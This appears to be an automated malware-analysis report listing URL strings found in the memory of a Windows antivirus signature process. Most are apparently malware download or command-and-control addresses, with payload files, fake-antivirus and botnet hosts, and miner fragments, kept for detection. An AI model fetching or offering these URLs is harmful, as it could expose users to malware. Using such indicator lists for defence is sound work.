Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://45.150.67.233/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://45.78.21.150/boost/boosting.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://46.101.202.232/wp-includes/mx_ib/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://46.30.43.8/gw.exe
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://4threquest.me/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://5.149.248.85/flashsec.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://5.149.248.85/flashupdate.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://5.149.248.85/info.txt
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.124.175/files/module.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.219.206/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.183.79.85/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.187.129.3/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.191.142.124/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.191.185.232/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.193.9.202/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://54.215.150.138/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://54.37.16.60/up/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://54.39.233.130/de3.tmp
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://63.251.20.97/links/return-west.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://66.117.6.174/ups.rar
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://6flp.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://78.46.16.53/~quickend/lll.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/bayo/b.wbk
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://81.176.237.140/serv/
Source: MpSigStub.exe, 00000024.00000003.6437007963.00000197A4B3B000.00000004.00000001.sdmp	String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://81.29.241.70/new/counter.phpframeborder=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://9.bohmamei.com/links/return-west.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://91.108.68.202/up.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://91.188.117.157/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://91.188.124.171/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://91.238.134.77/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://91.239.15.61/google.js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/blowjob.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.48/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.48/g
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://Botnet.8800.org
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://acacia19.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://ad.171817.com/css/1.js
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://adaptservices.net/qwao8cj4gkogu
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://adoffy.alltuckedinathome.com:8080/led.js
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
